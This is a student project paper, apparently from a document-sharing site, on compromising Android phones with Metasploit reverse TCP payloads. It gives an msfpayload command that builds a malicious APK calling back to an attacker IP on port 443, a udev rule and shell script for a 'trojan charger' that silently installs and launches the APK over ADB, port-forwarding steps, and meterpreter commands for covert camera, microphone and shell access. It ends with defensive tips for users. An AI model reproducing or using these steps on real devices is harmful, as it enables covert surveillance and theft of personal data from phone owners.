










Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
TCP/IP Based Exploits on Android using metasploit
Typology: Essays (high school)
1 / 18
This page cannot be seen from the preview
Don't miss anything!











Introduction
Over the last 10 years a revolution in information technology has taken place. Smartphones, devices that combine mobile communication, internet access, GPS tracking, digital cameras, and advanced computing capability into one hand held portable device, are owned by the majority of Americans and an everyday tool used for everything from conducting financial transactions to playing videogames. As with each new technology that is proliferated, the rapid expansion of its use makes it a high value target for those seeking to find ways to exploit it for nefarious gains.
In 2008 Google released an open source Linux kernel based smartphone platform called Android. The open nature of the platform made it ideal for device manufactures, such as Samsung and LG. Today Android powered smartphones make up the majority of mobile devices, and can be found on products ranging from tablets to the dashboard head unit of cars (Kerr, 2013). However, the open nature of the platform also creates a number of vulnerabilities that can be exploited in order to extract information from, or gain control of, the device.
In order for customers and clients to make reasoned decisions based on risk management factors it is essential to discover and catalog known and possible exploits that can be used of compromise the confidentiality of these smartphones. Gaining an understanding of how these exploits work provides programmers and security managers a starting point for finding and developing solutions for mitigating them. Furthermore, in the hands of proper authorities, the ability to compromise the confidentiality of a device can be necessary in order to audit users or conduct investigations.
Without having physical access to the device an attacker requires a remote access point, such as over a network. The connection to a network, such as the internet, that is a primary feature of
Smartphones which is ideal for making this kind of connection, and over the course of this project we intend to explore ways in which the Internet Protocol Suite can be used to the advantage of someone seeking to gain access to an Android powered device. We will be examining how the distribution of malicious APKs (Android Application Package), which contains code which produces an insecure TCP connection from the victim to the attacker over a network, can provide the attacker with access to a device. With this information we can then assess the vulnerability of various Android devices to compromise.
Background Just as the case with PCs, modern smartphones are vulnerable to the threat of malware. While principally malware targeting smartphones has focused on spyware and collecting information about users, in recent years there has been an increase in the proliferation of malware which creates rootkits and provide for remote shell access to an attacker (Castillo, 2011). Due to the fact that Android is based on the Linux Kernel, it is possible to port Linux based vulnerabilities on to Android devices. These types of exploits, which for years have been used to compromise Linux based systems, allows for the execution of privilege escalation or bypass allowing the potential to open the massive amounts of user data contained on a smartphone to be accessed over the internet in real time through a remote shell (Symantec, 2013).
From spyware to phishing attacks, the evolution of malware for Android has made huge leaps in the past couple of years. Android malware have become more sophisticated; in 2010 a study found the first SMS Trojan for Android. Commonly known as “FakePlayer,” the malicious application appears to be a media player application with a fake Microsoft Windows Media Player icon and the title “Movie Player” above that image/ it sends SMS messages to premium-rated services without the owner’s knowledge. The result for the owner is a big bill that the user pays for SMS messages. These exploits are cloaked as regular everyday applications so many users will install them without any hesitation. Google has since then removed the application off of the market place (Castillo, 2011). Android prides its self in
popularity over the last few years. Applications downloaded from the Amazon App store can today be found on 33% of Android devices and China’s HiAPK sees close to 300 Million downloads per month (onepf.org, Nd). This is significant, as in order to download these apps users are required to enable their device’s security to allow the installation of apps from unknown sources, opening up a potential security risk.
One of the most startling exploits that can be found in Android targeted malware is the Reverse TCP exploit. This is a reverse connection that bypasses fire wall restrictions using the Transmission Control Protocol (TCP). A firewall blocks all open ports, but it does not block outgoing traffic. A TCP 3- way handshake happens when a client connects to a server via an open port, but in a reverse connection the client opens the port the server connects to in order to bypass security restrictions. It is like having a backdoor within the firewall that can establish a connection by opening an outbound connection allowing you to send commands through the backdoor (Bechtsoudis, 2012). Malware which utilizes a reverse TCP, if installed on a device, will open a connection from a victim’s device to the workstation of an attacker. Once this connection is established the attacker can interface with the victim’s device, pulling data, executing commands on the device, or downloading information.
Lab Design, Methodology, and Results Lab Design In order to examine the test the vulnerability of Android powered smart phones to being exploited by an attacker using TCP exploits over the internet we will be creating a controlled environment which will consist of a wireless router with access to the internet, a Desktop 'attack' station, a diverse collection of Android powered devices with internet access, and a tojan phone charger. The APK used in these tests will be will be a generic one provided by Metasploit which contains the meterpreter reverse_tcp exploit for Android.
Metasploit is a penetration testing software that uncovers security holes in a network; it allows for a person to attack an immediate network in order to discover these holes (Kirsch, 2014). Someone may use Metasploit to prepare for similar attacks that may be launched by hackers, while being able to assess the network and its structure; it may also be used for one’s own research on exploiting devices through the internet. Meterpreter is a payload that uses in-memory DLL injection stagers to run over a network in real time. It works by the target device, in our case the Android phones and tablets, and the user of the device executes the initial stager. The stager loads all the necessary injection and loading of the DLL and then Meterpreter initializes and sends a GET. The host metasploit client then receives this GET and then has access to the device (Offensive Security, 2014).
The router will be used by the ‘attacker’s’ workstation, while the Android devices being penetrated will be connected to the internet either over a separate WiFi network or in the case of the HTC One over a cellular data network. The APK containing the exploit will be pushed through both the Android Debug Bridge (ADB) using a trojan charger and online by downloading it. Once the malicious APK is distributed to the device, the ‘attacker’s’ workstation will be used to open an interface with the device through the meterpreter handler. With this remote shell on the device established the ‘attacker’ will attempt to take control of certain device features such as the device’s camera and pull information off the device to include, but not limited to: SMS, call records, contact lists, and the device camera.
Equipment required: 1 Cisco-Linksys WRT120N Wireless-N Home Router w/ internet access 1 Desktop workstation
When the exploit on the device connects to the attacker's workstation the handler will open a session between the payload on the device and the handler on the attacker’s workstation, providing a command line interface from which the attacker can send commands to the device.
Prepare Port Forwarding While this step is not necessary if the attacker and victim are both on the same network, in most cases it will be necessary as the attacker and target device will need to communicate over a network such as the internet. Port forwarding allows the attacker to exploit the reverse_tcp shell from anywhere in the world, and more importantly will not require the victim's device to be online with a WiFi network, since smart phones are typically connected to cellular data networks at all times.
In the case where the attacker is using a router or over a VPN (which would be recommended for increased anonymity) the attacker will have a public and private IP address. The public IP address is the one being used over the internet, as seen here:
The private IP address relates to the machine the attacker is using, it can be determined by entering the command ‘ifconfig’ on the Kali Linux workstation, as seen here:
If the victim attempts to connect to the attacker's private IP address, the connection will fail, because that address is only being used behind the router. It is therefore necessary for the attacker to enable port forwarding. The exploit itself will contain the public IP address, as that is the IP address the victim’s machine will need to connect to. The attacker will then set their router to forward any connection to a certain port on the router, which is accessed using the public IP address, to the attacker's workstation, which is the private IP address. In this example the attacker is accessing his router’s settings and forwarding connections to ports 443 and 444 to the IP address of his workstation.
Now when the victim sends packets to the public IP address on port 443, those packets will be forwarded to the attacker's workstation on 24.0.211.254 on port 443. The reason for choosing port 443 is that it is a commonly used port, for Secure HTTP (HTTPS). If the victim is behind a firewall it may drop packets going out of or too certain ports that are not approved for the transmission of packets.
Creating the exploit The exploit can be compiled from source or built using Metasploit’s msfpayload function. Using Kali Linux and a generic reverse_tcp exploit provided with the Metasploit framework the APK is created by configuring msfpayload with the Android reverse_tcp exploit, as well as the IP address and the port we want the victim to connect to.
To create the malicious APK using the payload from meterpreter one can use the following command in Kali Linux: $msfpayload android/meterpreter/reverse_tcp LHOST=24.0.211.254 LPORT=443 R > exploit.apk This command will add the following code to the payload class of the APK, which is our reverse_tcp exploit:
making the icon appear as a program the user normally has on their phone would be an example of a change one can make.
Prepare Trojan Charger
An A10-OLinuXino-LIME with an A10 Cortex-A8 processor is running Debian wheezy from an SD card. The operating system on this board contains an Android Debug Bridge (ADB), a copy of an Android Package containing a reverse_tcp exploit (exploit.apk), and a shell script which installs and executes the APK. A rule is created in the /etc/udev/rules.d/51-android.rules file that will automate the distribution and execution of the exploit:
ACTION=="add", SUBSYSTEM=="usb_device", RUN+="/bin/APK_Pusher.sh"
This will cause the execution of APK_Pusher.sh whenever a device is connected. APK_Pusher.sh uses ADB to push the exploit to the device, install it, and execute it. The File ADB_Pusher.sh is as follows:
ADB_Pusher.sh: #! /bin/sh cd ~/./sudo adb devices ./sudo adb install exploit.apk./adb shell "am start -n com.metasploit.stage/com.metasploit.stage.MainActivity”
Preparing the Victim Four of the five of our Android devices were connected to a public WiFi network. These devices were the Motorola Droid Maxx, LG Optimus V, Google Nexus 7 Tablet, and Virgin Mobile PCD Chaser. Our fifth device, the HTC One, was not connected to a WiFi network, but instead connected only to its cellular data network. All five devices had USB debugging enabled. This is essential for testing the Trojan charger, as the APK cannot be installed through the USB without USB debugging enabled. Additionally, all devices had the installation of APKs from unknown sources disabled in their security settings.
Pushing the APK
By Trojan Charger Each Phone was connected to the Trojan charger individually. On three of the five devices connection with the A10-OLinuXino-LIME board’s USB port the shell script was executed without issue, installing exploit.apk and executing its payload. This occurred without any prompt or notification to the user that this was happening. These devices were the Virgin Mobile PCD Chaser, Motorola Droid Maxx, and LG Optimus V.
The HTC One and Nexus 7 tablet would both prompt the user to if they would allow USB debugging. This is due to the devices running a version of Android that contains enhanced security on USB debugging. This enhanced security was introduced with Android 4.2.2 and requires the user to verify if the device will accept a connection over the debug bridge (Ruddock, 2013).
If the user pressed “ok”, the APk would be pushed, installed, and executed with no further prompt or warning to the user. With exploit.apk installed and the payload running, the device would then begin initiating a TCP connection over the internet to the IP address 24.0.211.254 [the attacker’s public IP address] on port 443.
By Download
Once installed, it is still necessary for the user to execute the application, as it cannot be launched remotely. This simply involves having the user click on the icon for the app.
Once the icon is pressed the exploit will launch, initiating a TCP connection with our attacker’s workstation over IP address 24.0.211.254 on port 443. Exploiting the Reverse TCP Connection While exploit.apk was being pushed and installed; the attacker’s workstation was running Metasploit framework with the exploit handler, which was previously configured and launched, waiting for a connection. Once the exploit on the device connects to the handler on the attacker’s workstation an interface session will be opened by the handler, allowing the attacker to send commands to the device over the TCP connection. In all cases, regardless of device, OS, or access point, the exploit successfully established a reverse tcp shell between the attacker’s workstation and the device.
Overview of Meterpreter commands There are six core groups of commands that can be executed over this connection. They are Android Commands, WebCam commands, System commands, Networking commands, File System commands, and Core commands. Some of these commands are demonstrated below.
upload – This is a file system command that allows the attacker to upload a file from the attacker system to the victim’s device. This can be used to upload an exploit, such as GingerBreak, which can be used to gain root access to the device’s file system.
Shell - This is a system command that allows the attacker to access the shell on the command of the device. While in this shell the attacker can run standard Android/Linux commands on the device, edit or delete files, or explore the device’s file system
Webcam_Snap – This is a webcam command that activates the device’s built in camera, takes a photo, and downloads that photo to the attacker’s workstation. Other webcam commands include webcam_stream, which provides a continuous video stream from the device’s camera to the attacker’s workstation and record_mic, which turns on the device’s microphone and records audio for a specified period of time.
your device, there are other steps that can be taken to better protect yourself from encountering mobile malware. Precautions include:
Legitimate app stores
When downloading apps it's imperative that you only do so from a legitimate app store, such as the Google Play Store. By only using the Google Play Store a user can maintain the security restriction on installing unknown apps in place. This marketplaces is monitored and scanned for potentially dangerous or fraudulent programs. On occasion, however, malicious apps sometimes slip through the cracks, often disguised as legitimate ones. However, it still provides a higher level of security against malicious APKs.
Suspicious apps
One of the best defenses against malware is to notice things like suspicious apps with outrageous promises, bad reviews, and sketchy app permissions. If possible examine the source code by unpacking the APK on a computer and opening the files in in a text editor. Also important is to pay attention to information provided by the AndridManifest.xml file, which lists permissions you would be giving the application.
Settings
Google includes numerous settings in the Android operating system that can prevent malicious attacks. Devices running Android 2.2 or higher, which essentially means nearly all Android devices , have access to Google's malware scanner. Prior to installing an application you downloaded outside of the Play store, Google will scan the app and warn you of any potential threats.
This feature is enabled by default and can be accessed in the Google Settings app in your device's app drawer. Alternatively, devices running Android 4.2 or higher can access the feature by going to Settings, clicking on Security, and scrolling down to Verify apps.
Antivirus apps
The Google Play store is also home to hundreds of antivirus apps that can offer an extra layer of protection. Finding the right one, however, can sometimes be difficult. A simple "antivirus" search in the store yields more than 250 results. Companies like Avast, AVG, BitDefender, Kaspersky, Sophos, Symantec (Norton), and TrendMicro have long and established histories as some of the most trusted brands in the industry.
The live demo proves that this type of exploit is very effective in getting access to a user’s device. It shows the vulnerability in the Android’s native OS regardless of build, software, or settings. The exploit has the ability to provide an attacker access to personal and sensitive information on a device, including the ability to get root access by pushing an exploit and accessing the device’s shell. Due to the nature of reverse TCP exploits, the upmost strict security precautions should be taken. The only sure way to prevent yourself from being the victim of a reverse_tcp exploit, and maintain a reasonable amount of functionality for your device, is to ensure you do not have one installed on your device.
References